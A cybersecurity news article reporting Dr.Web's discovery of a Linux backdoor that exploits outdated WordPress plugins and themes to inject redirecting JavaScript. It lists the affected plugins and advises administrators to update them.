Linux backdoor malware infects WordPress-powered websites

January 9, 2023 - TuxCare PR Team

Dr. Web has discovered Linux.BackDoor.WordPressExploit.1, a website hacking tool based on the WordPress CMS. It takes advantage of 30 vulnerabilities in various plugins and themes for WordPress.

When websites use outdated versions of such add-ons that lack critical fixes, malicious JavaScripts are injected into the targeted webpages. As a result, users are redirected to other sites when they click on any part of an attacked page.

The Trojan is designed to target 32-bit Linux versions, but it can also run on 64-bit versions. Its primary function is to hack WordPress content management system (CMS) websites and inject malicious JavaScript into their webpages. These attacks target outdated plugins and themes that contain vulnerabilities that cybercriminals can exploit.

The targeted plugins include; WP Live Chat Support Plugin, WordPress – Yuzo Related Posts, Yellow Pencil Visual Theme Customizer Plugin, Easysmtp, WP GDPR Compliance Plugin, Newspaper Theme on WordPress Access Control (vulnerability CVE-2016-10972), Thim Core, Google Code Inserter, Total Donations Plugin, Post Custom Templates Lite, WP Quick Booking Manager, Faceboor Live Chat by Zotabox, Blog Designer WordPress Plugin, WordPress Ultimate FAQ (vulnerabilities CVE-2019-17232 and CVE-2019-17233), WP-Matomo Integration (WP-Piwik), WordPress ND Shortcodes For Visual Composer, WP Live Chat, Coming Soon Page and Maintenance Mode, Hybrid, Brizy WordPress Plugin, FV Flowplayer Video Player, WooCommerce, WordPress Coming Soon Page, WordPress theme OneTone, Simple Fields WordPress Plugin, WordPress Delucks SEO plugin, Poll, Survey, Form & Quiz Maker by OpinionStage, Social Metrics Tracker, WPeMatico RSS Feed Fetcher, and Rich Reviews.

In a Dr.Web post published on 30 December 2022, it was stated that “If sites use outdated versions of such add-ons, lacking crucial fixes, the targeted webpages are injected with malicious JavaScripts.”

When users attempt to access the abused WordPress page, they are redirected to other sites. The attacker selects the destination site, which may be used for phishing, malware distribution, or other malicious activities.

These redirections may be used to help remain undetected and blocking in phishing, malware distribution, and malvertising campaigns. However, the auto-injector operators may be selling their services to other cybercriminals.

The backdoor unleashes these attacks by exploiting known vulnerabilities in the aforementioned outdated WordPress plugins and themes. Malicious actors can control it remotely, with the harmful JavaScript coming from remote servers.

In its post on the subject, Dr.Web also stated that each of these variants contains “unimplemented functionality for hacking the administrator accounts of targeted websites using a brute-force attack—by applying known logins and passwords, using special vocabularies.” Furthermore, if this feature is implemented in future versions of this backdoor malware, even plugins with patched vulnerabilities could be successfully exploited.

Malicious actors remotely control the Trojan and communicate the address of the website to be infected via its command and control (C&C) server. Threat actors can also remotely disable the malware, shut it down, and stop logging its actions.

Dr. Web also mentions that it includes idle features that would enable brute-forcing attacks against website administrator accounts.

To defend against this threat, WordPress website administrators must update the themes and plugins running on the site to the latest available version and swap those that are no longer developed with alternatives that are supported.

The sources for this piece include an article in BleepingComputer.

Watch this news on our Youtube Channel: https://www.youtube.com/watch?v=S-KO8QIcdIk

Summary